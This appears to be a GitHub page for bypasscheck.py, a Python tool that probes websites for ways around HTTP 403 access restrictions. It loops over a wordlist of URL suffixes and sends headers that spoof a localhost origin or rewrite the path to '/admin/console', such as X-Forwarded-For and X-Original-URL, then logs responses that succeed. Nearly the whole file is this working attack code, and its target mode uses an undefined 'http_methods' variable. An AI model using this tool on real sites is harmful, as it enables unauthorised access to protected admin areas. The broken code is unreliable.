-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathbypasscheck.py
148 lines (136 loc) · 6.27 KB
/
bypasscheck.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
import argparse
import concurrent.futures
import json
import sys
from colorama import Fore, Style
from fake_useragent import UserAgent
import requests
def read_wordlist(wordlist):
try:
with open(wordlist, "r") as f:
return [x.strip() for x in f.readlines()]
except FileNotFoundError as fnf_err:
print(f"FileNotFoundError: {fnf_err}")
sys.exit(1)
def get_headers(path=None, method="GET"):
ua = UserAgent()
headers = [
{"User-Agent": str(ua.chrome), "X-Original-URL": path or "/"},
{"User-Agent": str(ua.chrome), "X-Custom-IP-Authorization": "127.0.0.1"},
# Add more headers with different combinations of HTTP verbs and other headers
{"User-Agent": str(ua.chrome), "X-Forwarded-For": "http://127.0.0.1"},
{"User-Agent": str(ua.chrome), "X-Forwarded-For": "127.0.0.1:80"},
{"User-Agent": str(ua.chrome), "X-Originally-Forwarded-For": "127.0.0.1"},
{"User-Agent": str(ua.chrome), "X-Originating-": "http://127.0.0.1"},
{"User-Agent": str(ua.chrome), "X-Originating-IP": "127.0.0.1"},
{"User-Agent": str(ua.chrome), "True-Client-IP": "127.0.0.1"},
{"User-Agent": str(ua.chrome), "X-WAP-Profile": "127.0.0.1"},
{"User-Agent": str(ua.chrome), "X-Arbitrary": "http://127.0.0.1"},
{"User-Agent": str(ua.chrome), "X-HTTP-DestinationURL": "http://127.0.0.1"},
{"User-Agent": str(ua.chrome), "X-Forwarded-Proto": "http://127.0.0.1"},
{"User-Agent": str(ua.chrome), "Destination": "127.0.0.1"},
{"User-Agent": str(ua.chrome), "X-Remote-IP": "127.0.0.1"},
{"User-Agent": str(ua.chrome), "X-Client-IP": "http://127.0.0.1"},
{"User-Agent": str(ua.chrome), "X-Host": "http://127.0.0.1"},
{"User-Agent": str(ua.chrome), "X-Forwarded-Host": "http://127.0.0.1"},
{"User-Agent": str(ua.chrome), "X-ProxyUser-Ip": "127.0.0.1"},
{"User-Agent": str(ua.chrome), "X-rewrite-url": path or "/"},
{"User-Agent": str(ua.chrome), "X-Original-URL": "/admin/console"},
{"User-Agent": str(ua.chrome), "X-Rewrite-URL": "/admin/console"},
{"User-Agent": str(ua.chrome), "Cluster-Client-IP": "127.0.0.1"},
{"User-Agent": str(ua.chrome), "X-HTTP-Method-Override": method}
]
return headers
def do_request(url, stream=False, path=None, method="GET"):
headers = get_headers(path=path, method=method)
try:
for header in headers:
if stream:
r = requests.request(method, url, stream=True, headers=header)
else:
r = requests.request(method, url, headers=header)
if r.status_code == 200 or r.status_code >= 500:
status_color = Fore.GREEN if r.status_code == 200 else Fore.RED
output_line = f"{Fore.WHITE}{url} {json.dumps(list(header.items())[-1])} {status_color}[{r.status_code}]{Style.RESET_ALL}"
if output_file:
with open(output_file, "a") as f:
f.write(output_line + "\n")
else:
print(output_line)
except requests.exceptions.RequestException as err:
print("Some Ambiguous Exception:", err)
def main(args):
wordlist = read_wordlist("bypasses.txt")
if args.domains:
if args.path:
print(Fore.CYAN + "Checking domains to bypass....")
checklist = read_wordlist(args.domains)
for line in checklist:
for bypass in wordlist:
links = f"{line}/{args.path}{bypass}"
do_request(links, stream=True, path=args.path)
else:
print(Fore.CYAN + "Checking domains to bypass....")
checklist = read_wordlist(args.domains)
for line in checklist:
for bypass in wordlist:
links = f"{line}{bypass}"
do_request(links, stream=True)
elif args.file:
if args.path:
print(Fore.CYAN + "Checking endpoints to bypass....")
endpoints = read_wordlist(args.file)
for endpoint in endpoints:
for bypass in wordlist:
links = f"{endpoint}/{args.path}{bypass}"
do_request(links, stream=True, path=args.path)
else:
print(Fore.CYAN + "Checking endpoints to bypass....")
endpoints = read_wordlist(args.file)
for endpoint in endpoints:
for bypass in wordlist:
links = f"{endpoint}{bypass}"
do_request(links, stream=True)
if args.target:
if args.path:
print(Fore.GREEN + f"Checking {args.target}...")
for method in http_methods:
for bypass in wordlist:
links = f"{args.target}/{args.path}{bypass}"
do_request(links, path=args.path, method=method)
else:
print(Fore.GREEN + f"Checking {args.target}...")
for method in http_methods:
for bypass in wordlist:
links = f"{args.target}{bypass}"
do_request(links, method=method)
if __name__ == "__main__":
banner = r"""
___________ ___. .__ .___ .___
\_ _____/_________\_ |__ |__| __| _/__| _/____ ____
| __)/ _ \_ __ \ __ \| |/ __ |/ __ |/ __ \ / \
| \( <_> ) | \/ \_\ \ / /_/ / /_/ \ ___/| | \
\___ / \____/|__| |___ /__\____ \____ |\___ >___| /
\/ \/ \/ \/ \/ \/ v0.04
"""
print(Fore.CYAN + banner)
parser = argparse.ArgumentParser()
group = parser.add_mutually_exclusive_group()
group.add_argument(
"-p", "--path", action="store", help="add a path to bypass", metavar="path"
)
group.add_argument(
"-d", "--domains", action="store", help="check a list of domains to bypass"
)
group.add_argument(
"-f", "--file", action="store", help="check a list of endpoints to bypass"
)
parser.add_argument(
"-t", "--target", action="store", help="single target to check", metavar="target"
)
parser.add_argument(
"-o", "--output", action="store", help="output file path", metavar="output.txt"
)
args = parser.parse_args()
output_file = args.output
main(args)